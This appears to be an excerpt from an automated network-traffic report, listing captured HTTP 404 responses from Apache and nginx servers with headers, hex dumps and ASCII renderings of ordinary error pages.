Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:06:41 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Mon, 30 Sep 2024 19:17:41 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]MN9Pfz{wbka+fI\|)DVh[`%t\|dklW<#[+Dhr.tCQ)y"lj`U^@
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:06:43 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Mon, 30 Sep 2024 19:17:41 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]MN9Pfz{wbka+fI\|)DVh[`%t\|dklW<#[+Dhr.tCQ)y"lj`U^@
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:06:46 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Mon, 30 Sep 2024 19:17:41 GMTAccept-Ranges: bytesContent-Length: 2361Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 35 37 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 37 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:07:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:07:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:07:52 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:07:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 21 Jan 2025 14:08:04 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:15:46 GMTServer: Apache/2.4.37 (AlmaLinux) OpenSSL/1.1.1kContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:15:49 GMTServer: Apache/2.4.37 (AlmaLinux) OpenSSL/1.1.1kContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:15:51 GMTServer: Apache/2.4.37 (AlmaLinux) OpenSSL/1.1.1kContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:15:54 GMTServer: Apache/2.4.37 (AlmaLinux) OpenSSL/1.1.1kContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
